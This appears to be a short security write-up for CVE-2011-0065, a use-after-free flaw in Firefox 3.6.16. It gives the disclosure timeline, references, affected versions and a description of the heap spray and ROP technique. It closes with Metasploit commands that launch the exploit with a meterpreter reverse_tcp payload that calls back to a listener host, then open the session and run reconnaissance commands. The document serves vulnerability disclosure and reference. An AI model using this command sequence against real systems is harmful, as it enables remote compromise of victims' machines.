Timeline :
Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to vendor on 2011-02-17
Coordinated public release of the vulnerability on 2011-04-28
Metasploit PoC provided on 2011-08-10
PoC provided by :
regenrecht
Rh0
Reference(s) :
CVE-2011-0065
OSVDB-72085
ZDI-11-158
MFSA-2011-13
Affected version(s) :
Firefox 3.6.17 and below
Firefox 3.5.19 and below
Seamonkey 2.0.14 and below
Tested on Windows XP SP3 with :
Mozilla Firefox 3.6.16
Description :
This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT element's mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink interface. mChannel then becomes a dangling pointer and is reused when the OBJECT's data attribute is set. (Discovered by regenrecht.) This module uses a heap spray with a minimal ROP chain to bypass DEP on Windows XP SP3.
Commands :
use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
getuid
sysinfo
ipconfig